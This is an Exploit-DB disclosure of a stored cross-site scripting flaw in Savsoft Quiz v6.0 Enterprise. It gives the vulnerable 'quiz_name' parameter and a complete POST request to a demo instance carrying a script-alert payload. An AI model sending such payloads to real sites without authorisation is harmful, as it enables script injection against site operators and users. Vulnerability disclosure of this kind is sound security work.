Savsoft Quiz v6.0 Enterprise - Stored XSS

EDB-ID:

51988

CVE:

N/A


Author:

Eren Sen

Type:

webapps


Platform:

PHP

Date:

2024-04-13


# Exploit Title: Savsoft Quiz v6.0 Enterprise - Persistent Cross-Site
Scripting
# Date: 2024-01-03
# Exploit Author: Eren Sen
# Vendor: SAVSOFT QUIZ
# Vendor Homepage: https://savsoftquiz.com
# Software Link: https://savsoftquiz.com/web/index.php/online-demo/
# Version: < 6.0
# CVE-ID: N/A
# Tested on: Kali Linux / Windows 10
# Vulnerabilities Discovered Date : 2024/01/03

# Persistent Cross Site Scripting (XSS) Vulnerability
# Vulnerable Parameter Type: POST
# Vulnerable Parameter: quiz_name

# Proof of Concepts:

https://demos1.softaculous.com/Savsoft_Quizdemk1my5jr/index.php/quiz/edit_quiz/13

# HTTP Request:

POST /Savsoft_Quizdemk1my5jr/index.php/quiz/insert_quiz/ HTTP/1.1
Host: demos1.softaculous.com
Cookie: ci_session=xxxxxxxxxxxxxxxxxxxxxxxxx
Content-Length: 411
Cache-Control: max-age=0
Sec-Ch-Ua:
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: ""
Upgrade-Insecure-Requests: 1
Origin: https://demos1.softaculous.com
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/114.0.5735.199 Safari/537.36
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer:
https://demos1.softaculous.com/Savsoft_Quizdemk1my5jr/index.php/quiz/add_new
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

quiz_name=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&description=%3Cp%3Etest%3C%2Fp%3E&start_date=2024-01-04+01%3A00%3A27&end_date=2025-01-03+01%3A00%3A27&duration=10&maximum_attempts=10&pass_percentage=50&correct_score=1&incorrect_score=0&ip_address=&view_answer=1&with_login=1&show_chart_rank=1&camera_req=0&gids%5B%5D=1&quiz_template=Default&question_selection=0&quiz_price=0&gen_certificate=0&certificate_text=